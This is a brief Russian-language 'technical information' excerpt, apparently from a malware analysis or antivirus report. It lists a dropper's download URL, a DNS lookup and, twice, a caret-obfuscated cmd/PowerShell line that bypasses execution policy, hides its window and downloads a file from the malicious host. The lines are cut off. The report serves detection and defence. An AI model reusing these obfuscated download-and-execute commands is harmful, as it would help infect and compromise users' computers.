Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWErs^H^eLl.eXE ^-EX^E^C^U^T^i^On^PolIcY byp^as^S -No^pRo^FiLE -^Win^dOwSTYLe HiD^d^eN (New^-ObjEcT ^s^Y^S^t^E^M.^Ne^T.w^eBC^LiENT^)^.D^OWnlOa^DfilE('http://mondayhelthc....
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pOWErs^H^eLl.eXE ^-EX^E^C^U^T^i^On^PolIcY byp^as^S -No^pRo^FiLE -^Win^dOwSTYLe HiD^d^eN (New^-ObjEcT ^s^Y^S^t^E^M.^Ne^T.w^eBC^LiENT^)^.D^OWnlOa^DfilE('http://mondayhelthc....' (со скрытым окном)